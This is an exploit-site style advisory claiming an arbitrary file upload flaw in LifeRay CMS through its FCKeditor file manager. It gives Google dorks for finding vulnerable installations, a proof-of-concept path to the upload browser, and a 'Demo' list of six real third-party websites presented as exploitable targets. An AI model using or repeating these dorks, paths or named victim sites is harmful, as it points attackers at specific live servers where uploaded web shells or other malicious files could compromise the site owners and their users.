[+] Title: LifeRay CMS (Fckeditor) Arbitrary File Upload Vulnerability
[+] Date: 2020/04/10
[+] Author: h4shur
[+] Team: Persian Security Group
[+] Vendor Homepage: www.liferay.com
[+] Software Link: www.liferay.com
[+] Tested on: Windows 10
[+] Category : Web Application Bugs
[+} Dork : inurl:/web/guest/
           inurl:/html/js/editor/fckeditor/

### Notes:

LifeRay allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications.


### POC:

[+] http://site/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html

### Demo:

[+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://www.ap239.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://franchise.hrblock.com.au/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://www.eof.gr/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://securefile.co/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html


### Special Thanks:

* Po0ri4 & b4ckdo0r 


### Contact Me :

* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur